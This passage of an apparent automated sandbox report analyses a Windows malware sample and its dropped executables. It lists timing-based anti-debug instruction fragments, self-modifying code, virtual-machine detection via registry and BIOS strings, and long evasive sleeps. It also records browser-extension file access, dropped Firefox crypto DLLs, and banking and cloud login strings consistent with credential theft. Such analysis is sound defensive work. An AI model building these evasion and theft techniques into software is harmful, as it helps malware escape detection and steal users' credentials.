FFFFFFF8h 0x0000004d jmp 00007FC9F53C6A7Bh 0x00000052 popfd 0x00000053 mov ah, 40h 0x00000055 popad 0x00000056 mov dword ptr [esp], ebx 0x00000059 push eax 0x0000005a push edx 0x0000005b pushad 0x0000005c mov bx, cx 0x0000005f popad 0x00000060 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 51209BC second address: 5120A01 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC9F53DFD64h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007FC9F53DFD5Dh 0x00000013 and ecx, 6D5250F6h 0x00000019 jmp 00007FC9F53DFD61h 0x0000001e popfd 0x0000001f mov edi, ecx 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 5120A01 second address: 5120A69 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC9F53C6A7Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007FC9F53C6A87h 0x00000011 or ax, D6DEh 0x00000016 jmp 00007FC9F53C6A89h 0x0000001b popfd 0x0000001c mov cx, 1DA7h 0x00000020 popad 0x00000021 xchg eax, esi 0x00000022 push eax 0x00000023 push edx 0x00000024 push eax 0x00000025 push edx 0x00000026 jmp 00007FC9F53C6A84h 0x0000002b rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 5120A69 second address: 5120A6F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 5120A6F second address: 5120AA3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC9F53C6A7Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, edi 0x0000000a jmp 00007FC9F53C6A80h 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FC9F53C6A7Eh 0x00000017 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 5120AA3 second address: 5120AF9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC9F53DFD5Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, edi 0x0000000a jmp 00007FC9F53DFD66h 0x0000000f mov eax, dword ptr [76FAB370h] 0x00000014 jmp 00007FC9F53DFD60h 0x00000019 xor dword ptr [ebp-08h], eax 0x0000001c jmp 00007FC9F53DFD60h 0x00000021 xor eax, ebp 0x00000023 push eax 0x00000024 push edx 0x00000025 push eax 0x00000026 push edx 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 5120AF9 second address: 5120AFD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 5120AFD second address: 5120B01 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 5120B01 second address: 5120B07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 5120B07 second address: 5120B0D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Tries to evade debugger and weak emulator (self modifying code)
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe Special instruction interceptor: First address: B0E9B6 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe Special instruction interceptor: First address: CBAEAE instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe Special instruction interceptor: First address: CE26C7 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe Special instruction interceptor: First address: D47A4F instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Special instruction interceptor: First address: 35E9B6 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Special instruction interceptor: First address: 50AEAE instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Special instruction interceptor: First address: 5326C7 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Special instruction interceptor: First address: 597A4F instructions caused by: Self-modifying code
Contains capabilities to detect virtual machines
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion Jump to behavior
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe Code function: 7_2_05170DC5 rdtsc 7_2_05170DC5
Contains long sleeps (>= 3 min)
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Thread delayed: delay time: 180000 Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Window / User API: threadDelayed 929 Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Window / User API: threadDelayed 1964 Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Window / User API: threadDelayed 3419 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window / User API: threadDelayed 407 Jump to behavior
Found dropped PE file which has not been started or loaded
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\msvcp140[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Dropped PE file which has not been started: C:\ProgramData\nss3.dll Jump to dropped file
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\nss3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\softokn3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\freebl3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Dropped PE file which has not been started: C:\ProgramData\freebl3.dll Jump to dropped file
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\vcruntime140[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\mozglue[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Dropped PE file which has not been started: C:\ProgramData\softokn3.dll Jump to dropped file
Found large amount of non-executed APIs
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe API coverage: 0.8 %
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe TID: 6848 Thread sleep count: 929 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 7476 Thread sleep count: 35 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 7476 Thread sleep time: -70035s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 7480 Thread sleep count: 40 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 7480 Thread sleep time: -80040s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 7440 Thread sleep count: 407 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 7440 Thread sleep time: -12210000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 7460 Thread sleep count: 38 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 7460 Thread sleep time: -76038s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 7468 Thread sleep time: -58029s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 7556 Thread sleep time: -720000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 7464 Thread sleep count: 34 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 7464 Thread sleep time: -68034s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 7440 Thread sleep time: -30000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000006001\528307a0ac.exe TID: 7624 Thread sleep count: 52 > 30 Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Code function: 0_2_6C55C930 GetSystemInfo,VirtualAlloc,GetSystemInfo,VirtualFree,VirtualAlloc, 0_2_6C55C930
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Thread delayed: delay time: 30000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Thread delayed: delay time: 180000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Thread delayed: delay time: 30000 Jump to behavior
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\ Jump to behavior
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\ Jump to behavior
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\ Jump to behavior
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\ Jump to behavior
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\ Jump to behavior
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\ Jump to behavior
Source: Wf9qnVcbi8.exe, 00000000.00000002.2189641658.000000000080C000.00000040.00000001.01000000.00000003.sdmp, 528307a0ac.exe, 0000000D.00000002.2715962638.000000000078C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 3Windows 2012 Server Standard without Hyper-V (core)
Source: Wf9qnVcbi8.exe, Wf9qnVcbi8.exe, 00000000.00000002.2189641658.000000000080C000.00000040.00000001.01000000.00000003.sdmp, 528307a0ac.exe, 528307a0ac.exe, 0000000D.00000002.2715962638.000000000078C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 11 Essential Server Solutions without Hyper-V
Source: Wf9qnVcbi8.exe, 00000000.00000002.2189641658.000000000080C000.00000040.00000001.01000000.00000003.sdmp, 528307a0ac.exe, 0000000D.00000002.2715962638.000000000078C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: #Windows 10 Microsoft Hyper-V Server
Source: Wf9qnVcbi8.exe, Wf9qnVcbi8.exe, 00000000.00000002.2189641658.000000000080C000.00000040.00000001.01000000.00000003.sdmp, 528307a0ac.exe, 528307a0ac.exe, 0000000D.00000002.2715962638.000000000078C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 8.1 Microsoft Hyper-V Server
Source: Wf9qnVcbi8.exe, Wf9qnVcbi8.exe, 00000000.00000002.2189641658.000000000080C000.00000040.00000001.01000000.00000003.sdmp, 528307a0ac.exe, 528307a0ac.exe, 0000000D.00000002.2715962638.000000000078C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2012 Server Standard without Hyper-V
Source: Wf9qnVcbi8.exe, Wf9qnVcbi8.exe, 00000000.00000002.2189641658.000000000080C000.00000040.00000001.01000000.00000003.sdmp, 528307a0ac.exe, 528307a0ac.exe, 0000000D.00000002.2715962638.000000000078C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 8 Microsoft Hyper-V Server
Source: Wf9qnVcbi8.exe, 00000000.00000002.2189641658.000000000080C000.00000040.00000001.01000000.00000003.sdmp, 528307a0ac.exe, 0000000D.00000002.2715962638.000000000078C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 3Windows 11 Server Enterprise without Hyper-V (full)
Source: Wf9qnVcbi8.exe, 00000000.00000002.2189641658.000000000080C000.00000040.00000001.01000000.00000003.sdmp, 528307a0ac.exe, 0000000D.00000002.2715962638.000000000078C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 5Windows 2012 Server Datacenter without Hyper-V (core)
Source: Wf9qnVcbi8.exe, 00000000.00000002.2189641658.000000000080C000.00000040.00000001.01000000.00000003.sdmp, 528307a0ac.exe, 0000000D.00000002.2715962638.000000000078C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 3Windows 2016 Server Standard without Hyper-V (core)
Source: Wf9qnVcbi8.exe, Wf9qnVcbi8.exe, 00000000.00000002.2189641658.000000000080C000.00000040.00000001.01000000.00000003.sdmp, 528307a0ac.exe, 528307a0ac.exe, 0000000D.00000002.2715962638.000000000078C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 8.1 Server Standard without Hyper-V (core)
Source: Wf9qnVcbi8.exe, 00000000.00000002.2189641658.000000000080C000.00000040.00000001.01000000.00000003.sdmp, 528307a0ac.exe, 0000000D.00000002.2715962638.000000000078C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 3Windows 11 Server Enterprise without Hyper-V (core)
Source: Wf9qnVcbi8.exe, 00000000.00000002.2189641658.000000000080C000.00000040.00000001.01000000.00000003.sdmp, 528307a0ac.exe, 0000000D.00000002.2715962638.000000000078C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: (Windows 2012 R2 Microsoft Hyper-V Server
Source: Wf9qnVcbi8.exe, Wf9qnVcbi8.exe, 00000000.00000002.2189641658.000000000080C000.00000040.00000001.01000000.00000003.sdmp, 528307a0ac.exe, 528307a0ac.exe, 0000000D.00000002.2715962638.000000000078C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 11 Microsoft Hyper-V Server
Source: Wf9qnVcbi8.exe, 00000000.00000002.2189641658.000000000080C000.00000040.00000001.01000000.00000003.sdmp, 528307a0ac.exe, 0000000D.00000002.2715962638.000000000078C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 6Windows 2012 R2 Server Standard without Hyper-V (core)
Source: Wf9qnVcbi8.exe, Wf9qnVcbi8.exe, 00000000.00000002.2189641658.000000000080C000.00000040.00000001.01000000.00000003.sdmp, 528307a0ac.exe, 528307a0ac.exe, 0000000D.00000002.2715962638.000000000078C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2012 R2 Server Standard without Hyper-V
Source: Wf9qnVcbi8.exe, Wf9qnVcbi8.exe, 00000000.00000002.2189641658.000000000080C000.00000040.00000001.01000000.00000003.sdmp, 528307a0ac.exe, 528307a0ac.exe, 0000000D.00000002.2715962638.000000000078C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 8 Server Datacenter without Hyper-V (core)
Source: Wf9qnVcbi8.exe, Wf9qnVcbi8.exe, 00000000.00000002.2189641658.000000000080C000.00000040.00000001.01000000.00000003.sdmp, 528307a0ac.exe, 528307a0ac.exe, 0000000D.00000002.2715962638.000000000078C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 10 Server Datacenter without Hyper-V (core)
Source: Amcache.hve.5.dr Binary or memory string: vmci.sys
Source: BGIIDAEB.0.dr Binary or memory string: AMC password management pageVMware20,11696428655
Source: Wf9qnVcbi8.exe, 00000000.00000002.2189641658.000000000080C000.00000040.00000001.01000000.00000003.sdmp, 528307a0ac.exe, 0000000D.00000002.2715962638.000000000078C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 0Windows 8 Server Standard without Hyper-V (core)
Source: Wf9qnVcbi8.exe, 00000000.00000002.2189641658.000000000080C000.00000040.00000001.01000000.00000003.sdmp, 528307a0ac.exe, 0000000D.00000002.2715962638.000000000078C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 6Windows 8.1 Essential Server Solutions without Hyper-V
Source: BGIIDAEB.0.dr Binary or memory string: tasks.office.comVMware20,11696428655o
Source: 528307a0ac.exe, 0000000D.00000002.2715962638.000000000078C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: vmware
Source: BGIIDAEB.0.dr Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: Wf9qnVcbi8.exe, Wf9qnVcbi8.exe, 00000000.00000002.2189641658.000000000080C000.00000040.00000001.01000000.00000003.sdmp, 528307a0ac.exe, 528307a0ac.exe, 0000000D.00000002.2715962638.000000000078C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 8 Server Standard without Hyper-V
Source: Wf9qnVcbi8.exe, 00000000.00000002.2189641658.000000000080C000.00000040.00000001.01000000.00000003.sdmp, 528307a0ac.exe, 0000000D.00000002.2715962638.000000000078C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 4Windows 8 Essential Server Solutions without Hyper-V
Source: Wf9qnVcbi8.exe, 00000000.00000002.2189641658.000000000080C000.00000040.00000001.01000000.00000003.sdmp, 528307a0ac.exe, 0000000D.00000002.2715962638.000000000078C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 5Windows 2012 Server Datacenter without Hyper-V (full)
Source: Wf9qnVcbi8.exe, Wf9qnVcbi8.exe, 00000000.00000002.2189641658.000000000080C000.00000040.00000001.01000000.00000003.sdmp, 528307a0ac.exe, 528307a0ac.exe, 0000000D.00000002.2715962638.000000000078C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2016 Essential Server Solutions without Hyper-V
Source: Wf9qnVcbi8.exe, 00000000.00000002.2189641658.000000000080C000.00000040.00000001.01000000.00000003.sdmp, 528307a0ac.exe, 0000000D.00000002.2715962638.000000000078C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 8Windows 2012 R2 Server Enterprise without Hyper-V (full)
Source: Wf9qnVcbi8.exe, 00000000.00000002.2189641658.000000000080C000.00000040.00000001.01000000.00000003.sdmp, 528307a0ac.exe, 0000000D.00000002.2715962638.000000000078C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 5Windows 2016 Server Datacenter without Hyper-V (full)
Source: Amcache.hve.5.dr Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.5.dr Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.5.dr Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.5.dr Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: BGIIDAEB.0.dr Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: Wf9qnVcbi8.exe, 00000000.00000002.2189641658.000000000080C000.00000040.00000001.01000000.00000003.sdmp, 528307a0ac.exe, 0000000D.00000002.2715962638.000000000078C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 2Windows 8 Server Enterprise without Hyper-V (core)
Source: Wf9qnVcbi8.exe, 00000000.00000002.2189641658.000000000080C000.00000040.00000001.01000000.00000003.sdmp, 528307a0ac.exe, 0000000D.00000002.2715962638.000000000078C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: "Windows 8 Microsoft Hyper-V Server
Source: Wf9qnVcbi8.exe, 00000000.00000002.2189641658.000000000080C000.00000040.00000001.01000000.00000003.sdmp, 528307a0ac.exe, 0000000D.00000002.2715962638.000000000078C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 4Windows 8.1 Server Datacenter without Hyper-V (full)
Source: explorti.exe, explorti.exe, 0000000C.00000002.3235833940.00000000004E8000.00000040.00000001.01000000.0000000D.sdmp Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: Wf9qnVcbi8.exe, 00000000.00000002.2189641658.000000000080C000.00000040.00000001.01000000.00000003.sdmp, 528307a0ac.exe, 0000000D.00000002.2715962638.000000000078C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 3Windows 11 Server Datacenter without Hyper-V (full)
Source: Amcache.hve.5.dr Binary or memory string: VMware Virtual USB Mouse
Source: Wf9qnVcbi8.exe, Wf9qnVcbi8.exe, 00000000.00000002.2189641658.000000000080C000.00000040.00000001.01000000.00000003.sdmp, 528307a0ac.exe, 528307a0ac.exe, 0000000D.00000002.2715962638.000000000078C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 10 Server Standard without Hyper-V
Source: 528307a0ac.exe, 0000000D.00000002.2717126137.0000000001898000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW85
Source: BGIIDAEB.0.dr Binary or memory string: discord.comVMware20,11696428655f
Source: Wf9qnVcbi8.exe, Wf9qnVcbi8.exe, 00000000.00000002.2189641658.000000000080C000.00000040.00000001.01000000.00000003.sdmp, 528307a0ac.exe, 528307a0ac.exe, 0000000D.00000002.2715962638.000000000078C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2012 R2 Microsoft Hyper-V Server
Source: Amcache.hve.5.dr Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: Wf9qnVcbi8.exe, 00000000.00000002.2189641658.000000000080C000.00000040.00000001.01000000.00000003.sdmp, 528307a0ac.exe, 0000000D.00000002.2715962638.000000000078C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 5Windows 2012 Server Enterprise without Hyper-V (core)
Source: Wf9qnVcbi8.exe, Wf9qnVcbi8.exe, 00000000.00000002.2189641658.000000000080C000.00000040.00000001.01000000.00000003.sdmp, 528307a0ac.exe, 528307a0ac.exe, 0000000D.00000002.2715962638.000000000078C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2012 R2 Server Enterprise without Hyper-V (full)
Source: Wf9qnVcbi8.exe, Wf9qnVcbi8.exe, 00000000.00000002.2189641658.000000000080C000.00000040.00000001.01000000.00000003.sdmp, 528307a0ac.exe, 528307a0ac.exe, 0000000D.00000002.2715962638.000000000078C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2012 R2 Server Datacenter without Hyper-V (core)
Source: Wf9qnVcbi8.exe, Wf9qnVcbi8.exe, 00000000.00000002.2189641658.000000000080C000.00000040.00000001.01000000.00000003.sdmp, 528307a0ac.exe, 528307a0ac.exe, 0000000D.00000002.2715962638.000000000078C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 11 Server Standard without Hyper-V (core)
Source: Wf9qnVcbi8.exe, Wf9qnVcbi8.exe, 00000000.00000002.2189641658.000000000080C000.00000040.00000001.01000000.00000003.sdmp, 528307a0ac.exe, 528307a0ac.exe, 0000000D.00000002.2715962638.000000000078C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 8.1 Essential Server Solutions without Hyper-V
Source: 528307a0ac.exe, 0000000D.00000002.2717126137.000000000185E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMwarel
Source: BGIIDAEB.0.dr Binary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
Source: BGIIDAEB.0.dr Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: BGIIDAEB.0.dr Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: Wf9qnVcbi8.exe, Wf9qnVcbi8.exe, 00000000.00000002.2189641658.000000000080C000.00000040.00000001.01000000.00000003.sdmp, 528307a0ac.exe, 528307a0ac.exe, 0000000D.00000002.2715962638.000000000078C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2012 R2 Server Standard without Hyper-V (core)
Source: Wf9qnVcbi8.exe, 00000000.00000002.2189641658.000000000080C000.00000040.00000001.01000000.00000003.sdmp, 528307a0ac.exe, 0000000D.00000002.2715962638.000000000078C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Hyper-V (guest)
Source: Amcache.hve.5.dr Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: BGIIDAEB.0.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: BGIIDAEB.0.dr Binary or memory string: outlook.office.comVMware20,11696428655s
Source: BGIIDAEB.0.dr Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: BGIIDAEB.0.dr Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: Amcache.hve.5.dr Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: Wf9qnVcbi8.exe, Wf9qnVcbi8.exe, 00000000.00000002.2189641658.000000000080C000.00000040.00000001.01000000.00000003.sdmp, 528307a0ac.exe, 528307a0ac.exe, 0000000D.00000002.2715962638.000000000078C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 10 Microsoft Hyper-V Server
Source: Wf9qnVcbi8.exe, Wf9qnVcbi8.exe, 00000000.00000002.2189641658.000000000080C000.00000040.00000001.01000000.00000003.sdmp, 528307a0ac.exe, 528307a0ac.exe, 0000000D.00000002.2715962638.000000000078C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2012 Essential Server Solutions without Hyper-V
Source: Amcache.hve.5.dr Binary or memory string: vmci.syshbin`
Source: BGIIDAEB.0.dr Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: Amcache.hve.5.dr Binary or memory string: \driver\vmci,\driver\pci
Source: Wf9qnVcbi8.exe, Wf9qnVcbi8.exe, 00000000.00000002.2189641658.000000000080C000.00000040.00000001.01000000.00000003.sdmp, 528307a0ac.exe, 528307a0ac.exe, 0000000D.00000002.2715962638.000000000078C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2012 R2 Server Datacenter without Hyper-V (full)
Source: Wf9qnVcbi8.exe, Wf9qnVcbi8.exe, 00000000.00000002.2189641658.000000000093C000.00000040.00000001.01000000.00000003.sdmp, 528307a0ac.exe, 528307a0ac.exe, 0000000D.00000002.2715962638.00000000008BC000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: ~VirtualMachineTypes
Source: BGIIDAEB.0.dr Binary or memory string: dev.azure.comVMware20,11696428655j
Source: BGIIDAEB.0.dr Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: Wf9qnVcbi8.exe, Wf9qnVcbi8.exe, 00000000.00000002.2189641658.000000000093C000.00000040.00000001.01000000.00000003.sdmp, 528307a0ac.exe, 528307a0ac.exe, 0000000D.00000002.2715962638.00000000008BC000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: ]DLL_Loader_VirtualMachine
